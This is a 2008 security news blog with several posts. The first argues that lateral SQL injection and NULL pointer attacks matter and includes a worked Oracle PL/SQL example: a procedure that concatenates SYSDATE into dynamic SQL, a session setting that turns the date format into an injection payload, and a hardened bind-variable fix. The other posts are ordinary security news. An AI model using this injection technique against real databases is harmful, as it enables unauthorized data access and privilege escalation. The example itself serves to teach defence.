Security Bytes - A SearchSecurity.com blog


The information security blog for the latest buzz on data security, privacy and regulatory compliance issues, information security threats, software security updates, flaws and more.

Why lateral SQL injection and NULL pointer attacks matter

There has been a lot of interesting work going on in the research community of late on a handful of really specialized and esoteric application attacks, like Mark Dowd’s NULL pointer attack and David Litchfield’s lateral SQL injection technique. These two methods have a few things in common, most notably that they both exploit things that were thought to be unexploitable: Litchfield showed that an Oracle PL/SQL procedure that takes no user input at all can still be injected if the attacker first alters the session’s date or number format, and Dowd showed that a NULL pointer dereference in Flash Player, long treated as a mere crash, can be turned into reliable code execution. One other similarity is that some people seem to be dismissing these techniques as theoretical or purely academic thought exercises that will never see the light of day. Proponents of this line of thinking say that enterprises don’t need to worry about crazy, multi-step attacks that are hard to understand. It’s things like buffer overflows and worms that really need your attention, they say.
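To make the “no input, still injectable” point concrete, here is an added illustration of the lateral SQL injection pattern in Oracle PL/SQL. It is not code from this post or from Litchfield’s paper; the procedure names `date_proc` and `date_proc_safe` are hypothetical, and the query against `all_objects` is just a convenient stand-in for whatever the real procedure would run.

```sql
-- Added example (hypothetical names): lateral SQL injection via NLS_DATE_FORMAT.

-- 1. A procedure that takes NO parameters. It looks injection-proof because the only
--    value concatenated into the dynamic SQL is SYSDATE, which no caller can supply.
CREATE OR REPLACE PROCEDURE date_proc AS
  stmt VARCHAR2(400);
BEGIN
  -- SYSDATE is a DATE. Concatenating it into a VARCHAR2 implicitly calls TO_CHAR
  -- with the *session's* NLS_DATE_FORMAT, and any user may change that setting.
  stmt := 'SELECT COUNT(*) FROM all_objects WHERE created = ''' || SYSDATE || '''';
  DBMS_OUTPUT.PUT_LINE(stmt);   -- show the statement that is actually executed
  EXECUTE IMMEDIATE stmt;
END;
/

-- 2. The "lateral" step: the caller changes how dates render in this session.
--    Text inside double quotes in a date mask is emitted literally, so from now on
--    SYSDATE renders as:   ' OR 1=1--
ALTER SESSION SET NLS_DATE_FORMAT = '"'' OR 1=1--"';

-- 3. Calling the procedure now builds and runs
--      SELECT COUNT(*) FROM all_objects WHERE created = '' OR 1=1--'
--    The attacker-chosen predicate is injected although no parameter exists.
SET SERVEROUTPUT ON
EXEC date_proc;

-- 4. Hardened form: bind the date instead of concatenating it. The value travels
--    as a DATE, so session NLS settings never touch the statement text.
CREATE OR REPLACE PROCEDURE date_proc_safe AS
  n NUMBER;
BEGIN
  EXECUTE IMMEDIATE 'SELECT COUNT(*) FROM all_objects WHERE created = :d'
    INTO n USING SYSDATE;
  DBMS_OUTPUT.PUT_LINE(n);
END;
/
```

The reason this matters rather than being a curiosity: PL/SQL procedures default to definer’s rights, so a procedure owned by a privileged schema that builds SQL this way runs the injected predicate (or a function call placed in the mask) with the owner’s privileges, and the caller needed nothing more than ALTER SESSION, which every account has. The same trick works on numbers through NLS_NUMERIC_CHARACTERS. Anything that concatenates a date or number into dynamic SQL should bind it, or at least format it with an explicit mask and wrap it with DBMS_ASSERT.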

This is, ah, how should I put it, ridiculous. These new attacks are exactly the kind of things that should worry you if you’re charged with protecting a corporate network. Hackers pay good money for reliable attack methods like this, particularly when they are brand new and not well understood. Security specialists know what a buffer overflow attack looks like, and there are any number of products out there that are capable of stopping these attacks. But the complex techniques like Litchfield’s and Dowd’s are the ones that find the cracks in network defenses, and by the time they’re recognized for what they are, it’s game over. And who’s to say that some hacker in Ukraine or Brazil or China hasn’t been using the same techniques for months?

Sure, worms and viruses and phishing are still threats, but to ignore new attacks because they look difficult or complex is foolish at best and negligent at worst.

Sophos: Sharp rise in Web threats

The Web now hosts an “unprecedented” number of threats, according to a report recently released by Sophos. In the first quarter of this year, Sophos researchers discovered a newly infected Web page every five seconds, three times more than last year.

What’s especially unsettling is that a whopping 79% of these sites are legitimate ones that have been hacked. Sophos cites a March attack on a European soccer ticket site that tried to infect visitors’ computers and a February attack on UK broadcaster ITV that targeted Windows and Mac users. The top two malware threats found on the Web, Mal/Iframe (a hidden iframe injected into a page) and Mal/ObfJS (obfuscated JavaScript), are used by criminals to infect Web sites by exploiting vulnerabilities, according to Sophos, a maker of antivirus software and other products.

The U.S. was the top country hosting Web-based malware in the first quarter. This year, it was responsible for hosting 42% of infected websites, up from last year, when it hosted less than 25%.

But while the number of infected Web pages is up this year, Sophos researchers tracked a decrease in the number of infected emails. One in every 2,500 emails was infected, a 40% drop from last year. Instead of sending a malicious attachment, criminals are sending links to compromised websites.

Cybercriminals use Beijing Olympics in Trojan attacks

We’ve seen the protests in the streets, but now MessageLabs is warning that it has tracked 13 Olympic themed attacks, designed to spread malware and ultimately steal data.

The attacks are originating from IP addresses in Asia, but there are no surprises here. The attackers are using social engineering to trick end users into clicking on a malicious link in an email message.

I was in San Francisco, attending RSA Conference 2008 when the Olympic torch was carried through the streets. All the security detail had to do to avoid protestors was to change the running route at the last minute. Unfortunately there’s no real “safe zone” in cyberspace.

Messages are being sent with legitimate-sounding subject titles such as “The Beijing 2008 Torch Relay” and “National Olympic Committee and Ticket Sales Agents,” MessageLabs said. Some attacks purport to be from the International Olympic Committee, based in Lausanne, Switzerland.

Let’s be honest here, these guys aren’t protesting the Beijing Olympics, they’re trying to steal identities and make a quick buck. They’re also doing a good job staying under the radar, according to MessageLabs. They’re using Microsoft Access database (MDB) files, usually hidden within ZIP files, in order to avoid detection by traditional antivirus engines.

Secure Computing CEO steps down

Secure Computing today named Daniel Ryan as interim CEO. He replaces John McNulty, who served as board chairman and CEO since 1999.

Ryan has served as the company’s president and chief operating officer since last August. Richard Scott, a Secure Computing board member since January 2006, was appointed chairman. McNulty will continue as a board member.

The San Jose-based vendor, which makes Web security gateways and other products, didn’t explain why McNulty is stepping down. A call to a company press contact was not immediately returned.

McNulty’s tenure included Secure Computing’s $274 million acquisition of email security vendor CipherTrust in 2006, which closely followed its $295 million acquisition of CyberGuard. Scott was a CyberGuard board member.

IBM Phantom to analyze virtual security

IBM’s X-Force security research team and IBM Research are studying ways to protect virtual computing environments. Code named Phantom, the research project has been ongoing and could result in new products and best practices designed to leverage the hypervisor to improve security. In this interview at RSA 2008, Joshua Corman, principal security strategist with IBM’s ISS team, explains Project Phantom and how IBM says it could help alleviate some of the risks associated with virtual environments.

Richard Stiennon joins new MSSP as CEO

Richard Stiennon, the well-traveled vendor executive and industry analyst, has taken up a new post as the CEO of new MSSP Seccom Global, an offshoot of Seccom Networks, an Australian company. Stiennon is a former Gartner analyst who probably is best known for a research study he was involved with in 2003 declaring that IDS was dead and encouraging enterprises to spend whatever money they had allocated for the technology on things like multi-function firewall appliances. “Intrusion detection systems are a market failure,” he said at the time. Most recently Stiennon was the chief marketing officer at Fortinet, which is a partner of Seccom. He also has spent time at independent analyst firm IT-Harvest, Webroot and PricewaterhouseCoopers.

Seccom’s Australian operation provides a number of managed security services, including mail and network monitoring. Stiennon’s appointment as CEO coincides with the company’s entry into the U.S. market, which already has its fair share of MSSPs. Large players such as VeriSign and Symantec have staked out the high end of the market and many ISPs, such as AT&T, have gotten into the business of offering security services in the cloud, as well. It will be interesting to see how an unknown company such as Seccom goes about competing with the big established MSSPs here. One would guess that Stiennon’s name recognition and extensive experience in the industry will help open a few doors at the very least.

Fighting security FUD

Bill Brenner

I recently tripped over a blog write-up from independent analyst Eric Ogren about his irritation with security vendors using FUD to sell products. It’s an older posting from 2006 but his message is as relevant today as it was two years ago.

Building his case around a threat report Websense released at the time, he wrote, “I’m not sure that the world is better off with yet another security vendor telling us that Phishing, malicious websites, malicious code, hacking tools, P2P, IM and Chat attacks have all increased.”

He dismissed the report as FUD marketing designed to create demand for security products, but said he believed such reports could actually have the opposite effect by pointing out the futility of security products in stopping attacks.

He’s not the first security expert to rail against the FUD factor. Security luminary Bruce Schneier has devoted huge chunks of his time speaking out against security ‘theatre’ — policies and products that are more about offering the perception of security rather than addressing the actual risks.

And, rightly or wrongly, the Apple crowd is constantly crying FUD whenever something is written about a security flaw or malware affecting their beloved Macs.

I bring up the issue because it’s long been a source of irritation for me. As a security writer, I’m constantly buried beneath tons of voicemail and email from vendors looking for attention, and the PR machinery almost always uses FUD to make a case for buying the latest compliance-out-of-the-box appliance or the “first of its kind” bot/spyware/worm/common cold zapper.

Along the way, the PR community likes to invent new words or phrases to define the threat, many of which start with the letters “ph” (phishing, pharming, phlooding).

I’ve been looking back through four years of writing for the sake of nostalgia. The big thing that strikes me is that we’ve written a lot of stories about the latest flaw or exploit and someone is always banging on the alarm bell with a hammer.

In the final analysis, it’s prudent to flag the latest flaws and exploits because IT security professionals need to be aware of these things and incorporate the information into their patch management process. Heck, alerting them to these things is what we’re here for. But the tone and level of alarm that should go into these stories is always something we wrestle with.

Everyone has a role to play in information security, from the IT pros to the vendors, analysts and media. But from the content I look back on, I see little evidence that vendor-generated fear has ever made a difference.

Warnings about some flaw or exploit opening the door for a catastrophic Internet-ending event are never followed by the big doom. On the other side of the spectrum, the epidemic of data security breaches shows that all the FUD and security spending in the world can’t prevent the bad guys from punching through. The recent Hannaford supermarkets breach proves you can respond to the fear and spend a lot of money on new technology and still get whacked.

I recently asked Rhode Island-based network engineer Edward Ziots whether he jumps at every exploit warning. Here’s what he told me by email:

“We don’t jump, it would be imprudent to do so. Basically I read up on how the exploit works, even look at the code offline to ascertain if it would be available to be downloaded or how much effort it would take to be in a working exploit. Next, you basically need to adjust your risk assessment based on the controls you have in house, and how many systems could be affected and in what manner.

“Lastly communicate the adjusted risk assessment to management, security and await decision on whether to raise priority for patching, or to deploy other security measures to mitigate until all systems can be patched.

“Honestly, it makes it very difficult with exploit code in the wild and reports of working exploits not to raise your risk level and deploy extra manpower and time and effort to get all systems patched. It’s just due diligence.”

My advice is to take the FUD with a grain of salt and remember that while cyberspace is a dangerous place and you’ll sometimes have to raise your level of alertness as Ziots does, most enterprises will survive with the proper mix of security tools, policies and a calm awareness of the risks.

About Security Blog Log: Senior News Writer Bill Brenner peruses security blogs each day to see what’s got the information security community buzzing. In this column he lists the weekly highlights. If you’d like to comment on the column or bring new security blogs to his attention, contact him at bbrenner@techtarget.com.

Flaw fixes for Firefox, Mac

A couple of notable security fixes to flag this morning:

First, Apple has patched the Safari Web browser flaw that famously earned a researcher $10,000 at the CanSecWest conference last month. Independent Security Evaluators researcher Charlie Miller used the vulnerability to compromise a MacBook Air laptop. The flaw is rooted in WebKit, the open-source HTML rendering engine used by Safari and several other Mac OS X programs.

Next, Mozilla has released Firefox 2.0.0.14, fixing a crash in the browser’s JavaScript engine that Mozilla rates critical because crashes of this kind have proved exploitable before. The advisory said, “Fixes for security problems in the JavaScript engine described in MFSA 2008-15 (CVE-2008-1237) introduced a stability problem, where some users experienced crashes during JavaScript garbage collection. This is being fixed primarily to address stability concerns. We have no demonstration that this particular crash is exploitable but are issuing this advisory because some crashes of this type have been shown to be exploitable in the past.”

Oracle preps CPU for 41 flaws

Oracle said Thursday that it is prepping a Critical Patch Update (CPU) to address 41 security holes across its product line.

According to the database giant’s advance CPU bulletin, attackers could exploit the most severe flaws to compromise the database server or the host operating system. Affected products include Oracle Database, Oracle Application Server, Oracle E-Business Suite and Applications, Oracle Enterprise Manager, Oracle PeopleSoft Enterprise and Oracle Siebel SimBuilder.

Oracle releases its security patches on a quarterly basis, and the April 2008 installment will be issued Tuesday.

RSA 2008: Firm makes log management a priority for compliance

Ira Hanson-Ralph of EnCana explains why the oil and gas exploration company made log management a priority as part of its compliance program. Hanson-Ralph is EnCana’s group leader of IS compliance and controls monitoring. The interview was conducted at RSA Conference 2008.